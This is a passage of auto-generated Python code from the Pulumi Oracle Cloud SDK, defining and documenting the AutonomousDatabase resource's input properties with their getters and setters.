private_endpoint_label: Optional[pulumi.Input[str]] = None,
refreshable_mode: Optional[pulumi.Input[str]] = None,
refreshable_status: Optional[pulumi.Input[str]] = None,
role: Optional[pulumi.Input[str]] = None,
rotate_key_trigger: Optional[pulumi.Input[bool]] = None,
service_console_url: Optional[pulumi.Input[str]] = None,
source: Optional[pulumi.Input[str]] = None,
source_id: Optional[pulumi.Input[str]] = None,
standby_db: Optional[pulumi.Input['AutonomousDatabaseStandbyDbArgs']] = None,
standby_whitelisted_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
state: Optional[pulumi.Input[str]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
switchover_to: Optional[pulumi.Input[str]] = None,
system_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
time_created: Optional[pulumi.Input[str]] = None,
time_deletion_of_free_autonomous_database: Optional[pulumi.Input[str]] = None,
time_maintenance_begin: Optional[pulumi.Input[str]] = None,
time_maintenance_end: Optional[pulumi.Input[str]] = None,
time_of_last_failover: Optional[pulumi.Input[str]] = None,
time_of_last_refresh: Optional[pulumi.Input[str]] = None,
time_of_last_refresh_point: Optional[pulumi.Input[str]] = None,
time_of_last_switchover: Optional[pulumi.Input[str]] = None,
time_of_next_refresh: Optional[pulumi.Input[str]] = None,
time_reclamation_of_free_autonomous_database: Optional[pulumi.Input[str]] = None,
timestamp: Optional[pulumi.Input[str]] = None,
used_data_storage_size_in_tbs: Optional[pulumi.Input[int]] = None,
vault_id: Optional[pulumi.Input[str]] = None,
whitelisted_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
Input properties used for looking up and filtering AutonomousDatabase resources.
:param pulumi.Input[str] admin_password: (Updatable) The password must be between 12 and 30 characters long, and must contain at least 1 uppercase, 1 lowercase, and 1 numeric character. It cannot contain the double quote symbol (") or the username "admin", regardless of casing. The password is mandatory if the `source` value is "BACKUP_FROM_ID", "BACKUP_FROM_TIMESTAMP", "DATABASE", or "NONE".
:param pulumi.Input['AutonomousDatabaseApexDetailsArgs'] apex_details: Information about Oracle APEX Application Development.
:param pulumi.Input[bool] are_primary_whitelisted_ips_used: (Updatable) This field is null if the Autonomous Database is not Data Guard enabled or Access Control is disabled. Its value is `TRUE` if the Autonomous Database is Data Guard enabled, Access Control is enabled, and the Autonomous Database uses the primary's IP access control list (ACL) for the standby. Its value is `FALSE` if the Autonomous Database is Data Guard enabled, Access Control is enabled, and the Autonomous Database uses a different IP access control list (ACL) for the standby than for the primary.
:param pulumi.Input[str] autonomous_container_database_id: The Autonomous Container Database [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm).
:param pulumi.Input[str] autonomous_database_backup_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the source Autonomous Database Backup that you will clone to create a new Autonomous Database.
:param pulumi.Input[str] autonomous_database_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the source Autonomous Database that you will clone to create a new Autonomous Database.
:param pulumi.Input[str] autonomous_maintenance_schedule_type: The maintenance schedule type of the Autonomous Database on shared Exadata infrastructure. The EARLY maintenance schedule of this Autonomous Database follows a schedule that applies patches prior to the REGULAR schedule. The REGULAR maintenance schedule of this Autonomous Database follows the normal cycle.
:param pulumi.Input[Sequence[pulumi.Input[str]]] available_upgrade_versions: List of Oracle Database versions available for a database upgrade. If there are no version upgrades available, this list is empty.
:param pulumi.Input['AutonomousDatabaseBackupConfigArgs'] backup_config: Autonomous Database configuration details for storing [manual backups](https://docs.cloud.oracle.com/iaas/Content/Database/Tasks/adbbackingup.htm) in the [Object Storage](https://docs.cloud.oracle.com/iaas/Content/Object/Concepts/objectstorageoverview.htm) service.
:param pulumi.Input[str] clone_type: The Autonomous Database clone type.
:param pulumi.Input[str] compartment_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment of the Autonomous Database.
:param pulumi.Input['AutonomousDatabaseConnectionStringsArgs'] connection_strings: The connection string used to connect to the Autonomous Database. The username for the Service Console is ADMIN. Use the password you entered when creating the Autonomous Database for the password value.
:param pulumi.Input['AutonomousDatabaseConnectionUrlsArgs'] connection_urls: The URLs for accessing Oracle Application Express (APEX) and SQL Developer Web with a browser from a Compute instance within your VCN or that has a direct connection to your VCN. Note that these URLs are provided by the console only for databases on [dedicated Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adbddoverview.htm). Example: `{"sqlDevWebUrl": "https://<hostname>/ords...", "apexUrl": "https://<hostname>/ords..."}`
:param pulumi.Input[int] cpu_core_count: (Updatable) The number of OCPU cores to be made available to the database. For Autonomous Databases on dedicated Exadata infrastructure, the maximum number of cores is determined by the infrastructure shape. See [Characteristics of Infrastructure Shapes](https://www.oracle.com/pls/topic/lookup?ctx=en/cloud/paas/autonomous-database&id=ATPFG-GUID-B0F033C1-CC5A-42F0-B2E7-3CECFEDA1FD1) for shape details.
:param pulumi.Input[Sequence[pulumi.Input['AutonomousDatabaseCustomerContactArgs']]] customer_contacts: (Updatable) Customer Contacts.
:param pulumi.Input[str] data_safe_status: (Updatable) Status of the Data Safe registration for this Autonomous Database. It can be `REGISTERED` or `NOT_REGISTERED`.
:param pulumi.Input[int] data_storage_size_in_gb: (Updatable) The size, in gigabytes, of the data volume that will be created and attached to the database. This storage can later be scaled up if needed. The maximum storage value is determined by the infrastructure shape. See [Characteristics of Infrastructure Shapes](https://www.oracle.com/pls/topic/lookup?ctx=en/cloud/paas/autonomous-database&id=ATPFG-GUID-B0F033C1-CC5A-42F0-B2E7-3CECFEDA1FD1) for shape details.
:param pulumi.Input[int] data_storage_size_in_tbs: (Updatable) The size, in terabytes, of the data volume that will be created and attached to the database. This storage can later be scaled up if needed. For Autonomous Databases on dedicated Exadata infrastructure, the maximum storage value is determined by the infrastructure shape. See [Characteristics of Infrastructure Shapes](https://www.oracle.com/pls/topic/lookup?ctx=en/cloud/paas/autonomous-database&id=ATPFG-GUID-B0F033C1-CC5A-42F0-B2E7-3CECFEDA1FD1) for shape details.
:param pulumi.Input[str] db_name: The database name. The name must begin with an alphabetic character and can contain a maximum of 14 alphanumeric characters. Special characters are not permitted. The database name must be unique in the tenancy.
:param pulumi.Input[str] db_version: (Updatable) A valid Oracle Database version for Autonomous Database. The `db_workload` values AJD and APEX are only supported for `db_version` `19c` and above.
:param pulumi.Input[str] db_workload: (Updatable) The Autonomous Database workload type. The following values are valid:
* OLTP - indicates an Autonomous Transaction Processing database
* DW - indicates an Autonomous Data Warehouse database
* AJD - indicates an Autonomous JSON Database
* APEX - indicates an Autonomous Database with the Oracle APEX Application Development workload type. Note: `db_workload` can only be updated from AJD to OLTP or from a free OLTP to AJD.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm).
:param pulumi.Input[str] display_name: (Updatable) The user-friendly name for the Autonomous Database. The name does not have to be unique.
:param pulumi.Input[int] failed_data_recovery_in_seconds: Indicates the number of seconds of data loss for a Data Guard failover.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
:param pulumi.Input[str] infrastructure_type: The infrastructure type this resource belongs to.
:param pulumi.Input[bool] is_access_control_enabled: (Updatable) Indicates if database-level access control is enabled. If disabled, database access is defined by the network security rules. If enabled, database access is restricted to the IP addresses defined by the rules specified with the `whitelistedIps` property. While specifying `whitelistedIps` rules is optional, if database-level access control is enabled and no rules are specified, the database will become inaccessible. The rules can be added later using the `UpdateAutonomousDatabase` API operation or the edit option in the console. When creating a database clone, the desired access control setting should be specified. By default, database-level access control is disabled for the clone.
:param pulumi.Input[bool] is_auto_scaling_enabled: (Updatable) Indicates if auto scaling is enabled for the Autonomous Database OCPU core count. The default value is `FALSE`.
:param pulumi.Input[bool] is_data_guard_enabled: (Updatable) Indicates whether the Autonomous Database has Data Guard enabled.
:param pulumi.Input[bool] is_dedicated: True if the database is on [dedicated Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adbddoverview.htm).
:param pulumi.Input[bool] is_free_tier: (Updatable) Indicates if this is an Always Free resource. The default value is false. Note that Always Free Autonomous Databases have 1 CPU and 20 GB of memory. For Always Free databases, memory and CPU cannot be scaled. When `db_workload` is `AJD` or `APEX`, it cannot be `true`.
:param pulumi.Input[bool] is_preview: Indicates if the Autonomous Database version is a preview version.
:param pulumi.Input[bool] is_preview_version_with_service_terms_accepted: If set to `TRUE`, indicates that an Autonomous Database preview version is being provisioned, and that the preview version's terms of service have been accepted. Note that preview version software is only available for databases on [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI).
:param pulumi.Input[bool] is_refreshable_clone: (Updatable) True for creating a refreshable clone; False for detaching the clone from the source Autonomous Database. Detaching is a one-time operation, and the clone becomes a regular Autonomous Database.
:param pulumi.Input[Sequence[pulumi.Input['AutonomousDatabaseKeyHistoryEntryArgs']]] key_history_entries: Key History Entry.
:param pulumi.Input[str] key_store_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the key store.
:param pulumi.Input[str] key_store_wallet_name: The wallet name for Oracle Key Vault.
:param pulumi.Input[str] kms_key_id: The OCID of the key container that is used as the master encryption key in database transparent data encryption (TDE) operations.
:param pulumi.Input[str] kms_key_lifecycle_details: KMS key lifecycle details.
:param pulumi.Input[str] license_model: (Updatable) The Oracle license model that applies to the Oracle Autonomous Database. Bring your own license (BYOL) allows you to apply your current on-premises Oracle software licenses to equivalent, highly automated Oracle PaaS and IaaS services in the cloud. License Included allows you to subscribe to new Oracle Database software licenses and the Database service. Note that when provisioning an Autonomous Database on [dedicated Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adbddoverview.htm), this attribute must be null because the attribute is already set at the Autonomous Exadata Infrastructure level. When using [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI), if a value is not specified, the system will supply the value of `BRING_YOUR_OWN_LICENSE`. It is a required field when `db_workload` is AJD and must be set to `LICENSE_INCLUDED`, as AJD does not support the default `license_model` value `BRING_YOUR_OWN_LICENSE`.
:param pulumi.Input[str] lifecycle_details: Additional information about the current lifecycle state.
:param pulumi.Input[Sequence[pulumi.Input[str]]] nsg_ids: (Updatable) A list of the [OCIDs](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the network security groups (NSGs) that this resource belongs to. Setting this to an empty array after the list is created removes the resource from all NSGs. For more information about NSGs, see [Security Rules](https://docs.cloud.oracle.com/iaas/Content/Network/Concepts/securityrules.htm). **NsgIds restrictions:**
* Autonomous Databases with private access require at least 1 Network Security Group (NSG). The nsgIds array cannot be empty.
:param pulumi.Input[float] ocpu_count: (Updatable) The number of OCPU cores to be made available to the database.
:param pulumi.Input[str] open_mode: The `DATABASE OPEN` mode. You can open the database in `READ_ONLY` or `READ_WRITE` mode.
:param pulumi.Input[str] operations_insights_status: Status of Operations Insights for this Autonomous Database.
:param pulumi.Input[str] permission_level: The Autonomous Database permission level. Restricted mode allows access only to admin users.
:param pulumi.Input[str] private_endpoint: The private endpoint for the resource.
:param pulumi.Input[str] private_endpoint_ip: The private endpoint IP address for the resource.
:param pulumi.Input[str] private_endpoint_label: (Updatable) The private endpoint label for the resource.
:param pulumi.Input[str] refreshable_mode: (Updatable) The refresh mode of the clone. AUTOMATIC indicates that the clone is automatically being refreshed with data from the source Autonomous Database.
:param pulumi.Input[str] refreshable_status: The refresh status of the clone. REFRESHING indicates that the clone is currently being refreshed with data from the source Autonomous Database.
:param pulumi.Input[str] role: The Data Guard role of the Autonomous Container Database, if Autonomous Data Guard is enabled.
:param pulumi.Input[bool] rotate_key_trigger: (Updatable) An optional property that, when flipped, triggers rotation of the KMS key. It is applicable only to dedicated databases, i.e. where `is_dedicated` is true.
:param pulumi.Input[str] service_console_url: The URL of the Service Console for the Autonomous Database.
:param pulumi.Input[str] source: The source of the database: Use `NONE` for creating a new Autonomous Database. Use `DATABASE` for creating a new Autonomous Database by cloning an existing Autonomous Database.
:param pulumi.Input[str] source_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the source Autonomous Database that you will clone to create a new Autonomous Database.
:param pulumi.Input['AutonomousDatabaseStandbyDbArgs'] standby_db: Autonomous Data Guard standby database details.
:param pulumi.Input[Sequence[pulumi.Input[str]]] standby_whitelisted_ips: (Updatable) The client IP access control list (ACL). This feature is available for autonomous databases on [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI) and on Exadata Cloud@Customer. Only clients connecting from an IP address included in the ACL may access the Autonomous Database instance.
:param pulumi.Input[str] state: (Updatable) The current state of the Autonomous Database. It can be set to `AVAILABLE` or `STOPPED`.
:param pulumi.Input[str] subnet_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the subnet the resource is associated with.
:param pulumi.Input[str] switchover_to: Applicable only when `is_data_guard_enabled` is true. It can be set to `PRIMARY` or `STANDBY`. The default value is `PRIMARY`.
:param pulumi.Input[Mapping[str, Any]] system_tags: System tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm).
:param pulumi.Input[str] time_created: The date and time the Autonomous Database was created.
:param pulumi.Input[str] time_deletion_of_free_autonomous_database: The date and time the Always Free database will be automatically deleted because of inactivity. If the database is in the STOPPED state and without activity until this time, it will be deleted.
:param pulumi.Input[str] time_maintenance_begin: The date and time when maintenance will begin.
:param pulumi.Input[str] time_maintenance_end: The date and time when maintenance will end.
:param pulumi.Input[str] time_of_last_failover: The timestamp of the last failover operation.
:param pulumi.Input[str] time_of_last_refresh: The date and time when last refresh happened.
:param pulumi.Input[str] time_of_last_refresh_point: The refresh point timestamp (UTC). The refresh point is the time to which the database was most recently refreshed. Data created after the refresh point is not included in the refresh.
:param pulumi.Input[str] time_of_last_switchover: The timestamp of the last switchover operation for the Autonomous Database.
:param pulumi.Input[str] time_of_next_refresh: The date and time of next refresh.
:param pulumi.Input[str] time_reclamation_of_free_autonomous_database: The date and time the Always Free database will be stopped because of inactivity. If this time is reached without any database activity, the database will automatically be put into the STOPPED state.
:param pulumi.Input[str] timestamp: The timestamp specified for the point-in-time clone of the source Autonomous Database. The timestamp must be in the past.
:param pulumi.Input[int] used_data_storage_size_in_tbs: The amount of storage that has been used, in terabytes.
:param pulumi.Input[str] vault_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the Oracle Cloud Infrastructure [vault](https://docs.cloud.oracle.com/iaas/Content/KeyManagement/Concepts/keyoverview.htm#concepts).
:param pulumi.Input[Sequence[pulumi.Input[str]]] whitelisted_ips: (Updatable) The client IP access control list (ACL). This feature is available for autonomous databases on [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI) and on Exadata Cloud@Customer. Only clients connecting from an IP address included in the ACL may access the Autonomous Database instance.
"""
if admin_password is not None:
pulumi.set(__self__, "admin_password", admin_password)
if apex_details is not None:
pulumi.set(__self__, "apex_details", apex_details)
if are_primary_whitelisted_ips_used is not None:
pulumi.set(__self__, "are_primary_whitelisted_ips_used", are_primary_whitelisted_ips_used)
if autonomous_container_database_id is not None:
pulumi.set(__self__, "autonomous_container_database_id", autonomous_container_database_id)
if autonomous_database_backup_id is not None:
pulumi.set(__self__, "autonomous_database_backup_id", autonomous_database_backup_id)
if autonomous_database_id is not None:
pulumi.set(__self__, "autonomous_database_id", autonomous_database_id)
if autonomous_maintenance_schedule_type is not None:
pulumi.set(__self__, "autonomous_maintenance_schedule_type", autonomous_maintenance_schedule_type)
if available_upgrade_versions is not None:
pulumi.set(__self__, "available_upgrade_versions", available_upgrade_versions)
if backup_config is not None:
pulumi.set(__self__, "backup_config", backup_config)
if clone_type is not None:
pulumi.set(__self__, "clone_type", clone_type)
if compartment_id is not None:
pulumi.set(__self__, "compartment_id", compartment_id)
if connection_strings is not None:
pulumi.set(__self__, "connection_strings", connection_strings)
if connection_urls is not None:
pulumi.set(__self__, "connection_urls", connection_urls)
if cpu_core_count is not None:
pulumi.set(__self__, "cpu_core_count", cpu_core_count)
if customer_contacts is not None:
pulumi.set(__self__, "customer_contacts", customer_contacts)
if data_safe_status is not None:
pulumi.set(__self__, "data_safe_status", data_safe_status)
if data_storage_size_in_gb is not None:
pulumi.set(__self__, "data_storage_size_in_gb", data_storage_size_in_gb)
if data_storage_size_in_tbs is not None:
pulumi.set(__self__, "data_storage_size_in_tbs", data_storage_size_in_tbs)
if db_name is not None:
pulumi.set(__self__, "db_name", db_name)
if db_version is not None:
pulumi.set(__self__, "db_version", db_version)
if db_workload is not None:
pulumi.set(__self__, "db_workload", db_workload)
if defined_tags is not None:
pulumi.set(__self__, "defined_tags", defined_tags)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if failed_data_recovery_in_seconds is not None:
pulumi.set(__self__, "failed_data_recovery_in_seconds", failed_data_recovery_in_seconds)
if freeform_tags is not None:
pulumi.set(__self__, "freeform_tags", freeform_tags)
if infrastructure_type is not None:
pulumi.set(__self__, "infrastructure_type", infrastructure_type)
if is_access_control_enabled is not None:
pulumi.set(__self__, "is_access_control_enabled", is_access_control_enabled)
if is_auto_scaling_enabled is not None:
pulumi.set(__self__, "is_auto_scaling_enabled", is_auto_scaling_enabled)
if is_data_guard_enabled is not None:
pulumi.set(__self__, "is_data_guard_enabled", is_data_guard_enabled)
if is_dedicated is not None:
pulumi.set(__self__, "is_dedicated", is_dedicated)
if is_free_tier is not None:
pulumi.set(__self__, "is_free_tier", is_free_tier)
if is_preview is not None:
pulumi.set(__self__, "is_preview", is_preview)
if is_preview_version_with_service_terms_accepted is not None:
pulumi.set(__self__, "is_preview_version_with_service_terms_accepted", is_preview_version_with_service_terms_accepted)
if is_refreshable_clone is not None:
pulumi.set(__self__, "is_refreshable_clone", is_refreshable_clone)
if key_history_entries is not None:
pulumi.set(__self__, "key_history_entries", key_history_entries)
if key_store_id is not None:
pulumi.set(__self__, "key_store_id", key_store_id)
if key_store_wallet_name is not None:
pulumi.set(__self__, "key_store_wallet_name", key_store_wallet_name)
if kms_key_id is not None:
pulumi.set(__self__, "kms_key_id", kms_key_id)
if kms_key_lifecycle_details is not None:
pulumi.set(__self__, "kms_key_lifecycle_details", kms_key_lifecycle_details)
if license_model is not None:
pulumi.set(__self__, "license_model", license_model)
if lifecycle_details is not None:
pulumi.set(__self__, "lifecycle_details", lifecycle_details)
if nsg_ids is not None:
pulumi.set(__self__, "nsg_ids", nsg_ids)
if ocpu_count is not None:
pulumi.set(__self__, "ocpu_count", ocpu_count)
if open_mode is not None:
pulumi.set(__self__, "open_mode", open_mode)
if operations_insights_status is not None:
pulumi.set(__self__, "operations_insights_status", operations_insights_status)
if permission_level is not None:
pulumi.set(__self__, "permission_level", permission_level)
if private_endpoint is not None:
pulumi.set(__self__, "private_endpoint", private_endpoint)
if private_endpoint_ip is not None:
pulumi.set(__self__, "private_endpoint_ip", private_endpoint_ip)
if private_endpoint_label is not None:
pulumi.set(__self__, "private_endpoint_label", private_endpoint_label)
if refreshable_mode is not None:
pulumi.set(__self__, "refreshable_mode", refreshable_mode)
if refreshable_status is not None:
pulumi.set(__self__, "refreshable_status", refreshable_status)
if role is not None:
pulumi.set(__self__, "role", role)
if rotate_key_trigger is not None:
pulumi.set(__self__, "rotate_key_trigger", rotate_key_trigger)
if service_console_url is not None:
pulumi.set(__self__, "service_console_url", service_console_url)
if source is not None:
pulumi.set(__self__, "source", source)
if source_id is not None:
pulumi.set(__self__, "source_id", source_id)
if standby_db is not None:
pulumi.set(__self__, "standby_db", standby_db)
if standby_whitelisted_ips is not None:
pulumi.set(__self__, "standby_whitelisted_ips", standby_whitelisted_ips)
if state is not None:
pulumi.set(__self__, "state", state)
if subnet_id is not None:
pulumi.set(__self__, "subnet_id", subnet_id)
if switchover_to is not None:
pulumi.set(__self__, "switchover_to", switchover_to)
if system_tags is not None:
pulumi.set(__self__, "system_tags", system_tags)
if time_created is not None:
pulumi.set(__self__, "time_created", time_created)
if time_deletion_of_free_autonomous_database is not None:
pulumi.set(__self__, "time_deletion_of_free_autonomous_database", time_deletion_of_free_autonomous_database)
if time_maintenance_begin is not None:
pulumi.set(__self__, "time_maintenance_begin", time_maintenance_begin)
if time_maintenance_end is not None:
pulumi.set(__self__, "time_maintenance_end", time_maintenance_end)
if time_of_last_failover is not None:
pulumi.set(__self__, "time_of_last_failover", time_of_last_failover)
if time_of_last_refresh is not None:
pulumi.set(__self__, "time_of_last_refresh", time_of_last_refresh)
if time_of_last_refresh_point is not None:
pulumi.set(__self__, "time_of_last_refresh_point", time_of_last_refresh_point)
if time_of_last_switchover is not None:
pulumi.set(__self__, "time_of_last_switchover", time_of_last_switchover)
if time_of_next_refresh is not None:
pulumi.set(__self__, "time_of_next_refresh", time_of_next_refresh)
if time_reclamation_of_free_autonomous_database is not None:
pulumi.set(__self__, "time_reclamation_of_free_autonomous_database", time_reclamation_of_free_autonomous_database)
if timestamp is not None:
pulumi.set(__self__, "timestamp", timestamp)
if used_data_storage_size_in_tbs is not None:
pulumi.set(__self__, "used_data_storage_size_in_tbs", used_data_storage_size_in_tbs)
if vault_id is not None:
pulumi.set(__self__, "vault_id", vault_id)
if whitelisted_ips is not None:
pulumi.set(__self__, "whitelisted_ips", whitelisted_ips)
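# A minimal, hypothetical usage sketch for these arguments, kept as a comment
# so that it is not executed at import time. The resource name, OCID, and
# password below are placeholders, and the sketch assumes the standard
# `pulumi_oci` package layout:
#
#   import pulumi_oci as oci
#
#   db = oci.database.AutonomousDatabase("exampleAdb",
#       compartment_id="ocid1.compartment.oc1..example",
#       db_name="exampledb",
#       db_workload="OLTP",
#       cpu_core_count=1,
#       data_storage_size_in_tbs=1,
#       admin_password="anExamplePassword123")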
@property
@pulumi.getter(name="adminPassword")
def admin_password(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The password must be between 12 and 30 characters long, and must contain at least 1 uppercase, 1 lowercase, and 1 numeric character. It cannot contain the double quote symbol (") or the username "admin", regardless of casing. The password is mandatory if source value is "BACKUP_FROM_ID", "BACKUP_FROM_TIMESTAMP", "DATABASE" or "NONE".
"""
return pulumi.get(self, "admin_password")
@admin_password.setter
def admin_password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "admin_password", value)
@property
@pulumi.getter(name="apexDetails")
def apex_details(self) -> Optional[pulumi.Input['AutonomousDatabaseApexDetailsArgs']]:
"""
Information about Oracle APEX Application Development.
"""
return pulumi.get(self, "apex_details")
@apex_details.setter
def apex_details(self, value: Optional[pulumi.Input['AutonomousDatabaseApexDetailsArgs']]):
pulumi.set(self, "apex_details", value)
@property
@pulumi.getter(name="arePrimaryWhitelistedIpsUsed")
def are_primary_whitelisted_ips_used(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) This field will be null if the Autonomous Database is not Data Guard enabled or Access Control is disabled. Its value is `TRUE` if the Autonomous Database is Data Guard enabled with Access Control enabled and uses the primary's IP access control list (ACL) for the standby. Its value is `FALSE` if the Autonomous Database is Data Guard enabled with Access Control enabled and uses a different IP access control list (ACL) for the standby than for the primary.
"""
return pulumi.get(self, "are_primary_whitelisted_ips_used")
@are_primary_whitelisted_ips_used.setter
def are_primary_whitelisted_ips_used(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "are_primary_whitelisted_ips_used", value)
@property
@pulumi.getter(name="autonomousContainerDatabaseId")
def autonomous_container_database_id(self) -> Optional[pulumi.Input[str]]:
"""
The Autonomous Container Database [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm).
"""
return pulumi.get(self, "autonomous_container_database_id")
@autonomous_container_database_id.setter
def autonomous_container_database_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "autonomous_container_database_id", value)
@property
@pulumi.getter(name="autonomousDatabaseBackupId")
def autonomous_database_backup_id(self) -> Optional[pulumi.Input[str]]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the source Autonomous Database Backup that you will clone to create a new Autonomous Database.
"""
return pulumi.get(self, "autonomous_database_backup_id")
@autonomous_database_backup_id.setter
def autonomous_database_backup_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "autonomous_database_backup_id", value)
@property
@pulumi.getter(name="autonomousDatabaseId")
def autonomous_database_id(self) -> Optional[pulumi.Input[str]]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the source Autonomous Database that you will clone to create a new Autonomous Database.
"""
return pulumi.get(self, "autonomous_database_id")
@autonomous_database_id.setter
def autonomous_database_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "autonomous_database_id", value)
@property
@pulumi.getter(name="autonomousMaintenanceScheduleType")
def autonomous_maintenance_schedule_type(self) -> Optional[pulumi.Input[str]]:
"""
The maintenance schedule type of the Autonomous Database on shared Exadata infrastructure. The EARLY maintenance schedule of this Autonomous Database follows a schedule that applies patches prior to the REGULAR schedule. The REGULAR maintenance schedule of this Autonomous Database follows the normal cycle.
"""
return pulumi.get(self, "autonomous_maintenance_schedule_type")
@autonomous_maintenance_schedule_type.setter
def autonomous_maintenance_schedule_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "autonomous_maintenance_schedule_type", value)
@property
@pulumi.getter(name="availableUpgradeVersions")
def available_upgrade_versions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of Oracle Database versions available for a database upgrade. If there are no version upgrades available, this list is empty.
"""
return pulumi.get(self, "available_upgrade_versions")
@available_upgrade_versions.setter
def available_upgrade_versions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "available_upgrade_versions", value)
@property
@pulumi.getter(name="backupConfig")
def backup_config(self) -> Optional[pulumi.Input['AutonomousDatabaseBackupConfigArgs']]:
"""
Autonomous Database configuration details for storing [manual backups](https://docs.cloud.oracle.com/iaas/Content/Database/Tasks/adbbackingup.htm) in the [Object Storage](https://docs.cloud.oracle.com/iaas/Content/Object/Concepts/objectstorageoverview.htm) service.
"""
return pulumi.get(self, "backup_config")
@backup_config.setter
def backup_config(self, value: Optional[pulumi.Input['AutonomousDatabaseBackupConfigArgs']]):
pulumi.set(self, "backup_config", value)
@property
@pulumi.getter(name="cloneType")
def clone_type(self) -> Optional[pulumi.Input[str]]:
"""
The Autonomous Database clone type.
"""
return pulumi.get(self, "clone_type")
@clone_type.setter
def clone_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "clone_type", value)
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment of the Autonomous Database.
"""
return pulumi.get(self, "compartment_id")
@compartment_id.setter
def compartment_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "compartment_id", value)
@property
@pulumi.getter(name="connectionStrings")
def connection_strings(self) -> Optional[pulumi.Input['AutonomousDatabaseConnectionStringsArgs']]:
"""
The connection string used to connect to the Autonomous Database. The username for the Service Console is ADMIN. Use the password you entered when creating the Autonomous Database for the password value.
"""
return pulumi.get(self, "connection_strings")
@connection_strings.setter
def connection_strings(self, value: Optional[pulumi.Input['AutonomousDatabaseConnectionStringsArgs']]):
pulumi.set(self, "connection_strings", value)
@property
@pulumi.getter(name="connectionUrls")
def connection_urls(self) -> Optional[pulumi.Input['AutonomousDatabaseConnectionUrlsArgs']]:
"""
The URLs for accessing Oracle Application Express (APEX) and SQL Developer Web with a browser from a Compute instance within your VCN or that has a direct connection to your VCN. Note that these URLs are provided by the console only for databases on [dedicated Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adbddoverview.htm). Example: `{"sqlDevWebUrl": "https://<hostname>/ords...", "apexUrl": "https://<hostname>/ords..."}`
"""
return pulumi.get(self, "connection_urls")
@connection_urls.setter
def connection_urls(self, value: Optional[pulumi.Input['AutonomousDatabaseConnectionUrlsArgs']]):
pulumi.set(self, "connection_urls", value)
@property
@pulumi.getter(name="cpuCoreCount")
def cpu_core_count(self) -> Optional[pulumi.Input[int]]:
"""
(Updatable) The number of OCPU cores to be made available to the database. For Autonomous Databases on dedicated Exadata infrastructure, the maximum number of cores is determined by the infrastructure shape. See [Characteristics of Infrastructure Shapes](https://www.oracle.com/pls/topic/lookup?ctx=en/cloud/paas/autonomous-database&id=ATPFG-GUID-B0F033C1-CC5A-42F0-B2E7-3CECFEDA1FD1) for shape details.
"""
return pulumi.get(self, "cpu_core_count")
@cpu_core_count.setter
def cpu_core_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "cpu_core_count", value)
@property
@pulumi.getter(name="customerContacts")
def customer_contacts(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['AutonomousDatabaseCustomerContactArgs']]]]:
"""
(Updatable) Customer Contacts.
"""
return pulumi.get(self, "customer_contacts")
@customer_contacts.setter
def customer_contacts(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['AutonomousDatabaseCustomerContactArgs']]]]):
